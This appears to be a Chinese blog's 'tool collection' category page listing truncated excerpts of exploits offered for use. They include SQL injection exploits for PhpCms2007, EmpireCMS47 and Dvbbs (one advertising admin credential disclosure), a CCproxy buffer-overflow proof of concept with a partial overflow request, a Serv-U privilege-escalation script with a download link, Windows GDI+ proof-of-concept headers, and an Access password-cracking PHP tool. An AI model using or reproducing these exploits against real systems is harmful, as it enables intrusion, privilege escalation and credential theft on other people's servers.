分类 ‘工具收集’ 下的日志

PhpCms2007 sp6 SQL injection 0day

<?
print_r('
--------------------------------------------------------------------------------
PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
BY T00ls(www.T00ls.net)
--------------------------------------------------------------------------------
');
 阅读全文 »
Tags: , ,

EmpireCMS47 sqlinject

<?php
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY  t00ls.net
+------------------------------------------------------------------+
");
 阅读全文 »
Tags:

Dvbbs·php Version 2.0++ Blind SQL Injection

<html>
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit  -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/
 阅读全文 »
Tags: , ,

CCproxy 6.5 Connect BufferOverflow POC

作者:Friddy

#Author:Friddy
#QQ:568623
#Email:[email protected]
import sys
import struct
import socket
from time import sleep
prinf “CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n”
buf=(“CONNECT “+”A”*1100+”:443 HTTP/1.0\n”
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n”
“Host: www.friddy.cn\n”
“Content-Length: 0\n”
“Proxy-Connection: Keep-Alive\n”
“Pragma: no-cache\x0d\x0a\x0d\x0a”)
阅读全文 »

Tags: ,

su提权通杀asp脚本

鬼仔注:备用地址

文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)

一直通杀到su7~~(这句是落叶说的,我可米说…….)

用来加ftp帐号的……本来想多玩会的.死J8头.

Download: https://dl.getdropbox.com/u/216079/servu[Lake2].rar

Tags: ,

MS Internet Explorer GDI+ Proof of Concept (MS08-052)

<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); }
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
————————————————
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
阅读全文 »

Tags: , ,

MS Windows GDI+ (.ico File) Remote Division By Zero Exploit

MS Windows GDI+ .ico Remote Division By Zero

Application: GDIPLUS.DLL

Web Site: http://www.microsoft.com/

Platform: Windows *

Bug: Division By Zero

Tested agains: XP SP3 fully patched

Note: This have nothing to do with http://milw0rm.com/exploits/4044
——————————————————-
阅读全文 »

Tags: , ,

Access在线解密[PHP源码]

作者:7jdg
来源:t00ls.net
只能解密2000或者97的MDB文件,本来要在CHA88用的.放这来吧..

<?
/*site:http://www.t00ls.net  */
/*如果转载请保留本信息  */
/*by:7jdg      QQ:7259561 */
$file=$_FILES['uploadfile']['tmp_name'];
$oldname =$_FILES['uploadfile']['name'];
$ext     =strtolower(substr(strrchr($oldname, '.'), 1));
if ($file)
{
 阅读全文 »
Tags: ,